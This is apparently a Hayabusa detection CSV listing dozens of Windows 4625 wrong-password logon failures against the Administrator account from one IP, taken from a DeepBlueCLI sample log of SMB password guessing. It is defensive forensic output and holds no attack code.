NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.764 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.181 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.796 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.224 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.688 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.129 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:38.580 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
